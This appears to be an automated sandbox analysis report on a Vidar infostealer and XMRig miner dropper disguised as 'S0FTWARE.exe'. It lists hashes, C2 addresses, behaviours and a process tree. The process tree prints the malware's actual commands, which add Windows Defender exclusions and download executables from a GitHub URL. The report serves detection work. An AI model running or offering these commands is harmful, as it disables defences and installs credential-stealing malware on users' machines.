Analysis
-
max time kernel
125s -
max time network
129s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
21/04/2025, 09:34
Static task
static1
Behavioral task
behavioral1
Sample
Iаuncher_v9.1.rar
Resource
win10v2004-20250314-en
Behavioral task
behavioral2
Sample
Iаuncher_v9.1.rar
Resource
win11-20250410-en
Behavioral task
behavioral3
Sample
S0FTWARE.exe
Resource
win10v2004-20250314-en
Behavioral task
behavioral4
Sample
S0FTWARE.exe
Resource
win11-20250410-en
General
-
Target
S0FTWARE.exe
-
Size
349KB
-
MD5
656a1813b1f6b1b23f86868148f03c97
-
SHA1
171427be31c7cd18d2838e9c985240a77370c99c
-
SHA256
98a355651f9f043e1ed3eaf1ac5ef8ff617f3438969e6488ef05ada40bac12d2
-
SHA512
69444b0a88c3a46da193a4920546a371b9243cb8a925ae725dc33e964f2342fe554e6e7f163f5d7eb6eb2b57e8d40d26e7fb2ff0ebf6b086402b20b69d21b2a7
-
SSDEEP
6144:ZdCuJHaXn51HBOWGEI8ue6/W4yJIyhBzOTVa:ZwuJqnbBjGEIn/W4yOk1
Malware Config
Extracted
vidar
13.5
fe765de57643ac9d227ea7737a97bb87
https://t.me/v00rd
https://steamcommunity.com/profiles/76561199846773220
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Signatures
-
Detect Vidar Stealer 1 IoCs
resource yara_rule behavioral3/files/0x00100000000240e8-34.dat family_vidar_v7 -
Vidar family
-
Xmrig family
-
XMRig Miner payload 9 IoCs
resource yara_rule behavioral3/memory/1088-635-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral3/memory/1088-639-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral3/memory/1088-641-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral3/memory/1088-640-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral3/memory/1088-638-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral3/memory/1088-637-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral3/memory/1088-634-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral3/memory/1088-661-0x0000000140000000-0x0000000140835000-memory.dmp xmrig behavioral3/memory/1088-662-0x0000000140000000-0x0000000140835000-memory.dmp xmrig -
Blocklisted process makes network request 6 IoCs
flow pid Process 14 4940 powershell.exe 16 4940 powershell.exe 19 5036 powershell.exe 24 5036 powershell.exe 31 1340 powershell.exe 35 1340 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1216 powershell.exe 2096 powershell.exe 1872 powershell.exe 5036 powershell.exe 1340 powershell.exe 4940 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 3 IoCs
flow pid Process 16 4940 powershell.exe 24 5036 powershell.exe 35 1340 powershell.exe -
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\system32\drivers\etc\hosts innkpa.exe File created C:\Windows\system32\drivers\etc\hosts Updater.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 8 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 3892 msedge.exe 4192 msedge.exe 5492 chrome.exe 5292 chrome.exe 5124 chrome.exe 2944 chrome.exe 2592 chrome.exe 4820 msedge.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation S0FTWARE.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation ruhgwolx.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation service.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation wszgzsr.exe -
Executes dropped EXE 5 IoCs
pid Process 4920 wszgzsr.exe 896 ruhgwolx.exe 4992 innkpa.exe 5292 Updater.exe 4560 service.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 15 raw.githubusercontent.com 16 raw.githubusercontent.com 24 raw.githubusercontent.com 35 raw.githubusercontent.com 204 pastebin.com 205 pastebin.com -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3008 powercfg.exe 752 powercfg.exe 5276 powercfg.exe 2500 powercfg.exe 3488 powercfg.exe 2744 powercfg.exe 3352 powercfg.exe 4352 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe innkpa.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe Updater.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 5292 set thread context of 5576 5292 Updater.exe 184 PID 5292 set thread context of 1088 5292 Updater.exe 189 -
resource yara_rule behavioral3/memory/1088-630-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral3/memory/1088-631-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral3/memory/1088-632-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral3/memory/1088-635-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral3/memory/1088-639-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral3/memory/1088-641-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral3/memory/1088-640-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral3/memory/1088-638-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral3/memory/1088-637-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral3/memory/1088-634-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral3/memory/1088-633-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral3/memory/1088-629-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral3/memory/1088-661-0x0000000140000000-0x0000000140835000-memory.dmp upx behavioral3/memory/1088-662-0x0000000140000000-0x0000000140835000-memory.dmp upx -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5136 sc.exe 3924 sc.exe 880 sc.exe 2748 sc.exe 4468 sc.exe 1508 sc.exe 2860 sc.exe 5956 sc.exe 2136 sc.exe 5772 sc.exe 5128 sc.exe 5084 sc.exe 3116 sc.exe 3724 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language service.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wszgzsr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ruhgwolx.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wszgzsr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wszgzsr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3444 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 52 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133897018060412769" chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5996 schtasks.exe 5840 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1216 powershell.exe 1216 powershell.exe 4940 powershell.exe 4940 powershell.exe 5036 powershell.exe 5036 powershell.exe 1340 powershell.exe 1340 powershell.exe 1340 powershell.exe 4920 wszgzsr.exe 4920 wszgzsr.exe 4920 wszgzsr.exe 4920 wszgzsr.exe 5492 chrome.exe 5492 chrome.exe 4920 wszgzsr.exe 4920 wszgzsr.exe 4920 wszgzsr.exe 4920 wszgzsr.exe 4992 innkpa.exe 2096 powershell.exe 2096 powershell.exe 2096 powershell.exe 4992 innkpa.exe 4992 innkpa.exe 4920 wszgzsr.exe 4920 wszgzsr.exe 4992 innkpa.exe 4992 innkpa.exe 4992 innkpa.exe 4992 innkpa.exe 4992 innkpa.exe 4992 innkpa.exe 4992 innkpa.exe 4992 innkpa.exe 4992 innkpa.exe 4992 innkpa.exe 4992 innkpa.exe 4992 innkpa.exe 5292 Updater.exe 1872 powershell.exe 1872 powershell.exe 1872 powershell.exe 5292 Updater.exe 5292 Updater.exe 5292 Updater.exe 5292 Updater.exe 5292 Updater.exe 5292 Updater.exe 5292 Updater.exe 5292 Updater.exe 5292 Updater.exe 5292 Updater.exe 5292 Updater.exe 5292 Updater.exe 1088 explorer.exe 1088 explorer.exe 1088 explorer.exe 1088 explorer.exe 4920 wszgzsr.exe 4920 wszgzsr.exe 1088 explorer.exe 1088 explorer.exe 1088 explorer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 4820 msedge.exe 4820 msedge.exe -
Suspicious use of AdjustPrivilegeToken 37 IoCs
description pid Process Token: SeDebugPrivilege 1216 powershell.exe Token: SeDebugPrivilege 4940 powershell.exe Token: SeDebugPrivilege 5036 powershell.exe Token: SeDebugPrivilege 1340 powershell.exe Token: SeShutdownPrivilege 5492 chrome.exe Token: SeCreatePagefilePrivilege 5492 chrome.exe Token: SeShutdownPrivilege 5492 chrome.exe Token: SeCreatePagefilePrivilege 5492 chrome.exe Token: SeShutdownPrivilege 5492 chrome.exe Token: SeCreatePagefilePrivilege 5492 chrome.exe Token: SeShutdownPrivilege 5492 chrome.exe Token: SeCreatePagefilePrivilege 5492 chrome.exe Token: SeShutdownPrivilege 5492 chrome.exe Token: SeCreatePagefilePrivilege 5492 chrome.exe Token: SeShutdownPrivilege 5492 chrome.exe Token: SeCreatePagefilePrivilege 5492 chrome.exe Token: SeShutdownPrivilege 5492 chrome.exe Token: SeCreatePagefilePrivilege 5492 chrome.exe Token: SeDebugPrivilege 2096 powershell.exe Token: SeShutdownPrivilege 2744 powercfg.exe Token: SeCreatePagefilePrivilege 2744 powercfg.exe Token: SeShutdownPrivilege 5276 powercfg.exe Token: SeCreatePagefilePrivilege 5276 powercfg.exe Token: SeShutdownPrivilege 2500 powercfg.exe Token: SeCreatePagefilePrivilege 2500 powercfg.exe Token: SeShutdownPrivilege 3488 powercfg.exe Token: SeCreatePagefilePrivilege 3488 powercfg.exe Token: SeDebugPrivilege 1872 powershell.exe Token: SeShutdownPrivilege 752 powercfg.exe Token: SeCreatePagefilePrivilege 752 powercfg.exe Token: SeShutdownPrivilege 3352 powercfg.exe Token: SeCreatePagefilePrivilege 3352 powercfg.exe Token: SeShutdownPrivilege 4352 powercfg.exe Token: SeCreatePagefilePrivilege 4352 powercfg.exe Token: SeShutdownPrivilege 3008 powercfg.exe Token: SeCreatePagefilePrivilege 3008 powercfg.exe Token: SeLockMemoryPrivilege 1088 explorer.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 5492 chrome.exe 4820 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5204 wrote to memory of 5920 5204 S0FTWARE.exe 91 PID 5204 wrote to memory of 5920 5204 S0FTWARE.exe 91 PID 5920 wrote to memory of 1216 5920 cmd.exe 93 PID 5920 wrote to memory of 1216 5920 cmd.exe 93 PID 5204 wrote to memory of 4764 5204 S0FTWARE.exe 94 PID 5204 wrote to memory of 4764 5204 S0FTWARE.exe 94 PID 4764 wrote to memory of 4940 4764 cmd.exe 95 PID 4764 wrote to memory of 4940 4764 cmd.exe 95 PID 5204 wrote to memory of 4912 5204 S0FTWARE.exe 97 PID 5204 wrote to memory of 4912 5204 S0FTWARE.exe 97 PID 4912 wrote to memory of 5036 4912 cmd.exe 98 PID 4912 wrote to memory of 5036 4912 cmd.exe 98 PID 5204 wrote to memory of 4920 5204 S0FTWARE.exe 99 PID 5204 wrote to memory of 4920 5204 S0FTWARE.exe 99 PID 5204 wrote to memory of 4920 5204 S0FTWARE.exe 99 PID 5204 wrote to memory of 1660 5204 S0FTWARE.exe 102 PID 5204 wrote to memory of 1660 5204 S0FTWARE.exe 102 PID 5204 wrote to memory of 896 5204 S0FTWARE.exe 103 PID 5204 wrote to memory of 896 5204 S0FTWARE.exe 103 PID 5204 wrote to memory of 896 5204 S0FTWARE.exe 103 PID 1660 wrote to memory of 1340 1660 cmd.exe 104 PID 1660 wrote to memory of 1340 1660 cmd.exe 104 PID 896 wrote to memory of 4348 896 ruhgwolx.exe 105 PID 896 wrote to memory of 4348 896 ruhgwolx.exe 105 PID 896 wrote to memory of 4348 896 ruhgwolx.exe 105 PID 4348 wrote to memory of 5996 4348 cmd.exe 107 PID 4348 wrote to memory of 5996 4348 cmd.exe 107 PID 4348 wrote to memory of 5996 4348 cmd.exe 107 PID 4920 wrote to memory of 5492 4920 wszgzsr.exe 108 PID 4920 wrote to memory of 5492 4920 wszgzsr.exe 108 PID 5492 wrote to memory of 5404 5492 chrome.exe 109 PID 5492 wrote to memory of 5404 5492 chrome.exe 109 PID 5492 wrote to memory of 5172 5492 chrome.exe 110 PID 5492 wrote to memory of 5172 5492 chrome.exe 110 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111 PID 5492 wrote to memory of 2952 5492 chrome.exe 111
Processes
-
C:\Users\Admin\AppData\Local\Temp\S0FTWARE.exe"C:\Users\Admin\AppData\Local\Temp\S0FTWARE.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5204 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\jejppb', 'C:\Users', 'C:\ProgramData'"2⤵
- Suspicious use of WriteProcessMemory
PID:5920 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\jejppb', 'C:\Users', 'C:\ProgramData'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\jejppb\wszgzsr.exe'"2⤵
- Suspicious use of WriteProcessMemory
PID:4764 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bilvarw.exe' -OutFile 'C:\Users\Admin\AppData\Local\jejppb\wszgzsr.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4940
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\jejppb\ruhgwolx.exe'"2⤵
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/coolnifas/frick/raw/refs/heads/main/bil2.exe' -OutFile 'C:\Users\Admin\AppData\Local\jejppb\ruhgwolx.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5036
-
-
-
C:\Users\Admin\AppData\Local\jejppb\wszgzsr.exe"C:\Users\Admin\AppData\Local\jejppb\wszgzsr.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4920 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"3⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5492 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa4eacdcf8,0x7ffa4eacdd04,0x7ffa4eacdd104⤵PID:5404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1548,i,6776491474880095691,7700440965466412932,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2152 /prefetch:34⤵PID:5172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2028,i,6776491474880095691,7700440965466412932,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2024 /prefetch:24⤵PID:2952
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2352,i,6776491474880095691,7700440965466412932,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2540 /prefetch:84⤵PID:2208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3188,i,6776491474880095691,7700440965466412932,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3224 /prefetch:14⤵
- Uses browser remote debugging
PID:2944
-
-
